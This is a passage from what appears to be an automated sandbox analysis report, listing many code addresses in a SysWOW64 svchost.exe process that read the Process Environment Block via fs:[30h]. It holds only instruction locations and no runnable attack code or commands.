            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C310 mov ecx, dword ptr fs:[00000030h]2_2_0372C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750310 mov ecx, dword ptr fs:[00000030h]2_2_03750310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037663FF mov eax, dword ptr fs:[00000030h]2_2_037663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC3CD mov eax, dword ptr fs:[00000030h]2_2_037EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B63C0 mov eax, dword ptr fs:[00000030h]2_2_037B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372826B mov eax, dword ptr fs:[00000030h]2_2_0372826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A250 mov eax, dword ptr fs:[00000030h]2_2_0372A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736259 mov eax, dword ptr fs:[00000030h]2_2_03736259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov eax, dword ptr fs:[00000030h]2_2_037B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov ecx, dword ptr fs:[00000030h]2_2_037B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372823B mov eax, dword ptr fs:[00000030h]2_2_0372823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402A0 mov eax, dword ptr fs:[00000030h]2_2_037402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402A0 mov eax, dword ptr fs:[00000030h]2_2_037402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov ecx, dword ptr fs:[00000030h]2_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C156 mov eax, dword ptr fs:[00000030h]2_2_0372C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C8158 mov eax, dword ptr fs:[00000030h]2_2_037C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov ecx, dword ptr fs:[00000030h]2_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760124 mov eax, dword ptr fs:[00000030h]2_2_03760124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov ecx, dword ptr fs:[00000030h]2_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038061E5 mov eax, dword ptr fs:[00000030h]2_2_038061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F0115 mov eax, dword ptr fs:[00000030h]2_2_037F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037601F8 mov eax, dword ptr fs:[00000030h]2_2_037601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03770185 mov eax, dword ptr fs:[00000030h]2_2_03770185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C073 mov eax, dword ptr fs:[00000030h]2_2_0375C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732050 mov eax, dword ptr fs:[00000030h]2_2_03732050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6050 mov eax, dword ptr fs:[00000030h]2_2_037B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6030 mov eax, dword ptr fs:[00000030h]2_2_037C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A020 mov eax, dword ptr fs:[00000030h]2_2_0372A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C020 mov eax, dword ptr fs:[00000030h]2_2_0372C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4000 mov ecx, dword ptr fs:[00000030h]2_2_037B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C0F0 mov eax, dword ptr fs:[00000030h]2_2_0372C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037720F0 mov ecx, dword ptr fs:[00000030h]2_2_037720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0372A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037380E9 mov eax, dword ptr fs:[00000030h]2_2_037380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B60E0 mov eax, dword ptr fs:[00000030h]2_2_037B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B20DE mov eax, dword ptr fs:[00000030h]2_2_037B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov eax, dword ptr fs:[00000030h]2_2_037F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov ecx, dword ptr fs:[00000030h]2_2_037F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C80A8 mov eax, dword ptr fs:[00000030h]2_2_037C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373208A mov eax, dword ptr fs:[00000030h]2_2_0373208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738770 mov eax, dword ptr fs:[00000030h]2_2_03738770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730750 mov eax, dword ptr fs:[00000030h]2_2_03730750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE75D mov eax, dword ptr fs:[00000030h]2_2_037BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4755 mov eax, dword ptr fs:[00000030h]2_2_037B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov esi, dword ptr fs:[00000030h]2_2_0376674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov ecx, dword ptr fs:[00000030h]2_2_0376273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AC730 mov eax, dword ptr fs:[00000030h]2_2_037AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730710 mov eax, dword ptr fs:[00000030h]2_2_03730710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760710 mov eax, dword ptr fs:[00000030h]2_2_03760710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C700 mov eax, dword ptr fs:[00000030h]2_2_0376C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE7E1 mov eax, dword ptr fs:[00000030h]2_2_037BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C0 mov eax, dword ptr fs:[00000030h]2_2_0373C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B07C3 mov eax, dword ptr fs:[00000030h]2_2_037B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037307AF mov eax, dword ptr fs:[00000030h]2_2_037307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D678E mov eax, dword ptr fs:[00000030h]2_2_037D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03762674 mov eax, dword ptr fs:[00000030h]2_2_03762674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374C640 mov eax, dword ptr fs:[00000030h]2_2_0374C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E627 mov eax, dword ptr fs:[00000030h]2_2_0374E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03766620 mov eax, dword ptr fs:[00000030h]2_2_03766620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768620 mov eax, dword ptr fs:[00000030h]2_2_03768620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373262C mov eax, dword ptr fs:[00000030h]2_2_0373262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772619 mov eax, dword ptr fs:[00000030h]2_2_03772619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE609 mov eax, dword ptr fs:[00000030h]2_2_037AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0376A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov eax, dword ptr fs:[00000030h]2_2_0376A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037666B0 mov eax, dword ptr fs:[00000030h]2_2_037666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C6A6 mov eax, dword ptr fs:[00000030h]2_2_0376C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
